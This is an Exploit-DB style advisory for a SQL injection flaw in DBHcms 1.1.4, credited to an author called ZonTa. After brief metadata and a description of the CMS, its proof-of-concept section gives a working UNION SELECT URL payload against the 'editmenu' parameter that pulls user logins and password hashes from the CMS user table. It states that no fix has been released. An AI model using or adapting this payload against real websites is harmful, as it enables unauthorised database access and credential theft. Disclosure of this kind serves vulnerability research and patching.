DBHcms 1.1.4 - 'dbhcms_pid' SQL Injection

EDB-ID:

15309


Author:

ZonTa

Type:

webapps


Platform:

PHP

Date:

2010-10-24


DBHcms 1.1.4 SQL Injection Vulnerability

# Exploit Title:    DBHcms 1.1.4 SQL Injection Vulnerability
# Date: 24-10-2010 
# Author: ZonTa
# Mail: zontahackers[at]gmail[dot]com 
# IM : zontahackers[at]live[dot]com

# Software Link:    http://www.drbenhur.com/downloads-dbhcms-114-1-69-en.html
# Version: 1.1.4
# Tested on: Apache,PHP5


ABOUT
--------------

The DBHcms is a Open Source content management system for personal
and small business websites. It is search engine optimized, also
for multiple languages simultaneously by allowing the search engine
bot to index every single page.


POC
--------------

http://192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--


FIX
--------------

Not yet released.


Greetz to Sri Lankanz ~